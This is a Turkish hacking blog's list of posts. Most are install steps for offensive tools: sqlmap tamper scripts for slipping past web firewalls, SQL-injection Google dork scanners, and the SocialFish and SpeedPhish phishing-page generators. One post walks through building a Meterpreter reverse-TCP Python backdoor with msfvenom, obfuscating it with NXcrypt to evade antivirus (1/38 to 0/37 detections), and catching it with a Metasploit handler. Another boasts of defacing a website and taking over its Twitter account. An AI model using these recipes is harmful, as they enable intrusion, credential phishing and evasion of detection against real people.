-->
Home » All posts

SQLMap Tamper Scripts

22:54:00

SQLMAP TAMPER SCRİPTS,


Sqlmap'de "tamper" (sabotaj) seçeneklerini anlamak.

Selamun ALeyküm ..
Aşagıdaki tabloada tamperlarin nerede kullanabiecegimizi görebeliceginiz bir tablo var.
Sabotaj verilerini kullanmanın, güvenlik duvarlarından kaçınmak ve olası bir uygulamayı filtrelemenin en büyük amacı olsa da, ne tür bir veritabanı yöneticisinin ne tür bir uygulayıcıya başvurduğunu bilmesi gerekir. 

Not: 
(*) Tüm sürümler için işe yarayabilir.
(-) uygulanmaz

TAMPERMySQLMSSQLOraclePostgreSQL
apostrophemask****
apostrophenullencode----
appendnullbyte****
base64encode4,5,5.5200510g-
between5.1---
bluecoat****
apostrophemask9.0.32000,2005-9.3
charunicodeencode4,5.0 and 5.5200510g8.3,8.4,9.0
charencode*---
commalessmid*---
concat2concatws****
equaltolike****
greatest< 5.1---
halfversionedmorekeywords5.0 and 5.5---
ifnull2ifisnull****
informationschemacomment4,5.0,5.5200510g8.3,8.4,9.0
lowercase5.0---
modsecurityversioned5.0---
modsecurityzeroversioned****
multiplespaces****
nonrecursivereplacement****
overlongutf85.1.56,5.5.112000, 2005N/A9.0
percentage4, 5.0,5.5200510g8.3,8.4,9.0
randomcase****
randomcomments****
securesphere4,5.0,5.5200510g8.3,8.4,9.0
space2comment----
space2dash4.0,5.0---
space2hash>= 5.1.13---
space2morehash-2000, 2005--
space2mssqlblank**--
space2mssqlhash****
space2plus4,5.0,5.5200510g8.3,8.4,9.0
space2randomblank-*--
sp_password****
symboliclogical****
unionalltounion****
unmagicquotes4, 5.0,5.5200510g8.3,8.4,9.0
uppercase****
varnish*---
versionedkeywords>=5.1.13---
versionedmorekeywords****
xforwardedfor****

Kali Linux SQLi Google Dork Scanner

13:02:00

Kali Linux SQLi Google Dork Scanner
Selamun Aleyküm ..

XGDork Google Dork Tarayıcı
Python 2.7 için ViraX @ 2018 tarafından kodlanan SQLi Google Dork Tarayıcı / Termux.Android.Lollipop5.0

Python 2.7 için URL aramayı otomatikleştiren, SQL enjeksiyonuna açık olan basit 'naif' program

[!] YASAL UYARI: Bu program ile yapacağınız yasadışı eylemlerden sorumlu değilim!,

Kurulum
git clone https://github.com/E4rr0r4/XGDork.git
cd XGDork
pip2 install requests
pip2 install termcolor
python2 XGDork.py --help


Kali Linux Cowsay & Figlet

12:09:00

Kali Linux Cowsay & Figlet
Selamun Aleyküm ...

GNU / Linux Terminalinizi Figlet ve Cowsay ile nasıl güzelleştireceğinizden bahsettim.
ilk olarak "apt-get install figlet " komutuyla figleti kuruyoruz
ardından ; Cowsay = "apt-get install cowsay" yazarak kurun.

Yeni bir terminal açıp root dizinindeyken (pwd) leafpad .bashrc dosyasını açınız. en alt satıra inerek;

figlet Nickiniz & Yada yazmak ıstedıgınız seyi yazınız.

Örnek: 
figlet TrazeR . org
/usr/games/cowsay -f  stegosaurus " Cyber-WarrioR.org "

cowsayı nasıl ekledık derseniz ;

cd /usr/share/cowsay/cows/ komutla cowsayın bulundugu dızıne girip ls komutuyla listeledikten sonra rasgele ascii hedef seçip dosya yolunu belirttiken sonra -f komutuyla kullanmak ıstedıgım ascii.cow'u belirttim " tırnak içinde istedigim metni yazdim"
Sonuç :
Cowsay Bazi Kullanım Örnekleri
/usr/games/cowsay -b TrazeR ===> bunu bashrc dosyanıza bu şekilde eklerseniz her terminali açtıgınızda aşağıdaki örnek resim gibi açılır.

/usr/games/cowsay -d Dead  ===> -d parametresi inegin ölü görünmesini saglar. İnek Öldü başımız saolsun

/usr/games/cowsay -g açgözlü inek modu ===> -g parametresi inegi aç gözlü moda alır. bizim inek canlandi.


 /usr/games/cowsay -p paronaya inek ===> -p parametresi ineği paronaya yapar.

/usr/games/cowsay -t yorgun inek

 /usr/games/cowsay -f dragon Cyber-WarrioR AKINCILAR ===>
–f seçeneği, kullanılacak belirli bir inek resmi dosyasını (cowfile) belirtir. Bu örnekte size bir ejderha resmi gösteriyorum. 
 Genel Olarak Kullanim: /usr/games/cowsay –f <cowfile> mesajiniz


                                                                           Video:



Kali Linux NXcrypt - Python Backdoor Framework

00:22:00

Selamun Aleyküm ..

msfvenom -p python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port -o /root/Masaüstü/output.py

git clone https://github.com/Hadi999/NXcrypt.git
cd NXcrypt
python NXcrypt.py --help

python NXcrypt.py -f /root/Masaüstü/testingpython.py -o /root/Masaüstü/cryptpython.py 


Before: Detected by 1/38
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd 

After:
 Detected by 0/37
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd

ENCRYPTİON FİNİSHED

Stop Using Virustotal !!!! Please, Use nodistribute.com

 continuation :
msfconsole 
use exploit/multi/handler/
use payload/python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port
options
ok
exploit -j


Kali Linux Auto Sql Dork Scanner

14:39:00

Selamun Aleyküm..

Resmi web sitesinden python 3'ü indirin https://www.python.org/downloads/ Sistemdeki python 3'ü yükleyin
Yada apt-get install python3

git clone https://github.com/aungsanoo/auto-sql-dork-scanner.git
python3 sql.py

dork.txt dosyasını istediğiniz gibi değiştirebilirsiniz.

Kali Linux Zeus-Scanner

12:02:00

Zeus nedir?
Zeus, web uygulaması keşiflerini basitleştirmek için tasarlanmış gelişmiş bir keşif programıdır. Zeus, güçlü bir yerleşik URL ayrıştırma motoru, birden fazla arama motoru uyumluluğu, URL'leri hem yasaklama hem de webcache URL'lerinden çıkarma, hedef üzerinde birden fazla güvenlik açığı değerlendirmesi yapma ve arama motoru captcha'larını atlama yeteneğine sahip olarak gelir.

Genel Özellikler:
Çoklu arama motoru uyumluluk ( DuckDuckGo, AOL, Bing, ve Google varsayılan Google)
Birden fazla güvenlik açığı değerlendirmesi (XSS, SQLi, clickjacking, port tarama, yönetici paneli bulma, whois aramaları ve daha fazlası)
URL’yi Google’ın yasak URL’si üzerinden alma ve böylece IP bloklarını atlayabilme
XSS yüklerini gizlemek için sabotaj komut dosyaları
20'den fazla farklı güvenlik duvarının WAF / IPS / IDS korumasını belirleme

Kurulum : 
Ubuntu / Debian
sudo apt-get install libxml2-dev libxslt1-dev python-dev &&  git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py

Genel Kullanım : python zeus.py -d inurl:news.php?id=



Kali Linux Sqlmap Web Gui

00:13:00

Selamun Aleyküm ..

Kurulum:
git clone https://github.com/Hood3dRob1n/SQLMAP-Web-GUI.git
Sqlmap dizinini ve içeriklerini web kök dizininize kopyalayın. (cd SQLMAP-Web-GUI && cp -R sqlmap / /var/www/html)

Kullanmak istediğinizde, sqlmap API sunucusunu ve apache servisini çalıştirin (python /home/user/sqlmap/sqlmapapi.py -s)
Daha sonra başlatmak için tarayıcınızda Web GUI adresine gidebilirsiniz. (http://127.0.0.1/sqlmap/index.php yada)


Ek olarak videonun devamini çektim ancak birleştiremedim birleşince bir buçuk saat oluyor sebebsiz yere anlam veremedim neyse. sqlmap web gui de enumeration kısmından db ayarlarını yapmanız gerekıyor işlem bitince View Scan Log dosyasında görebilirsiniz detaylari.

Kali Linux Penetration Test Tool Uidsploit Framework

22:41:00

Selamun Aleyküm ..
Komut Dosyası Linux'ta Test Edildi (Kali Linux, Debian, ...)
'DDoS Router'ı Çalıştırmak için' Sisteminizde 'aircrack-ng' Olmasi Gerekmektedir.

Kurulum:
apt-get update
apt-get install git python python-pip -y
git clone https://github.com/siruidops/uidsploit.git

cd uidsploit/
chmod +x install.sh
./install.sh
python uidsploit.py
uidsploit

show   < modülleri göster
update < güncelleme uidsploit
exit   <  çıkış

uidsploit >>>


Kali Linux Dork Scanner Bingoo

16:38:00

Selamun Aleyküm..

Kurulum:
apt-get install lynx
 apt-get install curl
git clone https://github.com/Hood3dRob1n/BinGoo.git
cd Bingoo
./Bingoo

Daha detayli isterseniz : Tz Bingoo

Kali Linux Video Editor Kdenlive

16:02:00

Selamun Aleyküm ..
Kdenlive linux da videolarınızı düzenleyeme intro, müzik efekt vs eklemenize yarar genelde ben bunu kullanıyorum.
apt-get  install kdenlive


Kali Linux Video Editor OpenShot

01:43:00

Selamun Aleyküm ..

OpenShot Video Editor Linux sistemler için Python, GTK ve MLT Framework ile yazılmış özgür bir video düzenleme yazılımıdır.
Linux Sistemler için ; apt-get install openshot 


Kali Linux Speed Phishing Framework

18:15:00

Selamun Aleyküm .. 

SPF (SpeedPhish Framework), basit sosyal mühendislik kimlik avı egzersizlerinin çabuk keşif ve dağıtımına izin vermek için tasarlanmış bir python araçtır.

Kurulum :

pip install dnspython
pip install pycrypto

apt-get install python-twisted-web
apt-get install phantomjs

git clone  https://github.com/tatanus/SPF.git

Yürütme:
cd spf
python spf.py --test -d example.com

ya da sadece web sitelerini test etmek için:
cd spf
python web.py default.cfg


Kali Linux Ultimate Phishing Tool Socialfish

19:23:00

Selamun Aleyküm ..
Bu Araç Ngrok Kullanarak Hizli Bir Şekilde Phising Sayfasi Oluşturmaniza Yarar.

MEVCUT SAYFALAR
+ Facebook:

Geleneksel Facebook giriş sayfası.
Facebook'la gelişmiş giriş.
+ Google:

Geleneksel Google giriş sayfası.
Facebook'la gelişmiş giriş.
+ LinkedIn:

Geleneksel LinkedIn oturum açma sayfası.
+ Github:

Geleneksel Github giriş sayfası.
+ Stackoverflow:

Geleneksel Stackoverflow giriş sayfası.
+ Wordpress:

Benzer Wordpress giriş sayfası.
+ Twitter:

Geleneksel Twitter giriş sayfası.

Kurulum ;
git clone https://github.com/UndeadSec/SocialFish.git
cd SocialFish
sudo pip install -r requirements.txt
python SocialFish.py

Bu Araçla Oluşturulan Kimlik Avı Sayfalarını
intitle:"There's a Phishing Page generated by SocialFish in this website." Yazarak Bulabilirsiniz.

Video:



Sahte Banka Siteleriyle Dolandırıcılık Hakkinda

13:22:00



Bankaların resmi sitelerini birebir kopyalayan bilgisayar korsanlarının, banka müşterilerinin özel bilgilerini ele geçirerek vatandaşları dolandırdığını yıllardır biliyoruz zaten yeni birşey değil ...

Sosyal medyada bazi kanı bozuk insanlar facebook, instagram, twitter gibi platformlardan  kendilerinin oluşturdukları SAHTE BANKA  sitelerinin reklamlarını yapmaktadırlar bunlara itimat etmeyin girdiginiz sitelere Dikkat ediniz!

SSL Sertifikasina ALDANMAYİNİZ.

Bakiniz : Sizce bu site orjinal sitemi ?

Evet tahmin ettiğiniz gibi değil zaten. Bir çok VATAN'daşımız Bu konuda mağdur malesef
Bu Tür REKLAMLARA ALDIRMAYINIZ!
Daha dün akşam aldığim bir ekran görüntüsü;


Birebir ziraat bankasının aynısını yapmışlar o kısmın ekran göruntüsünü alamadık malum saat geç olmuştu, admin paneline girdiğimizde ziraatbank-inetbireysel.com adresinden başka bir adrese yönlendiriyordu 
Panelden yönlendirilen site: vakifgiris.com'du



biz gerekli bilgileri almaya çalışırken sanırım fark edildik  Dns kayıtlari değiştirilerek default olarak ayarlandı.

Uzun lafın kısası diyeceğim şu ki ; 

Bizlere düşen görev;
Bu tür sitelere denk geldiğimiz zaman gerekli kurumlara anında mail göndermek. Ardından çevremizdekilerin bu tür olaylara inanmayacağını, önüne gelen her linke girilmeyeceğini yönünde bilinçlendirmemiz gerekiyor. Özellikle çevremizde bulunan yaşlılara durumu anlayabilecekleri şekilde anlatmamız gerekiyor, çoğunlukla yaşlı kesimin bu olaylar hakkında bilgisi daha az oluyor.

Anonturkey.org Hacked

01:22:00

Selamun Aleykum,

Dün gece geç saatlerde Cumhurbaşkanımız hakkında Anonymous tarafından ahlaksız bir paylaşım yapıldı.
Bu devletin başında her kim olursa olsun yapılacak bir saygısızlık Türk milletine yapılmış bir saygısızlıktır!
Bu topluluğun Türkiye kolu olarak geçinen, geçinmeye çalışan ve kendilerini bu şekilde gösterenlere "Sipahilerin" mührünü vurduk!

İndexte gereken her şey yazıyor...

zone: http://www.zone-h.org/mirror/id/30823099?zh=1



Varan 2! Anonturkey Twitter Hesabı Hacked!

Dün akşam saatlerinde bu çapulcuların sitesine uğramıştık.
İlgili Konu; Özel Saldırılar - Anonturkey.org Hacked!

Hemen akabinde bunlardan alışık olduğumuz "Bize ait değil" açıklaması beklerken daha farklı bir söylem ile karşı karşıya kaldık. Hoş bu tür sözlere de alışkınız.. 

"Cumhurbaşkanımıza yapılan ahlaksızlığa cevap verdik diye Milli Şuur ve feraset noktasında kurulduğumuz ilk günden beridir taviz vermeyen ve hiç bir karşılık beklemeden Sayısız operasyona imza atmış Sipahiler’e “Paralı Köpek” yakıştırmasını yapabilecek kadar hadsiz ve onursuz bu oluşumun son kolu twitter hesabına da "Sipahi" mührü vurduk. "



Emeği geçen Sipahiler personelinin yüreğine sağlık... 
Unuttuğunuz ne var ise hatırlatmaya geliyoruz...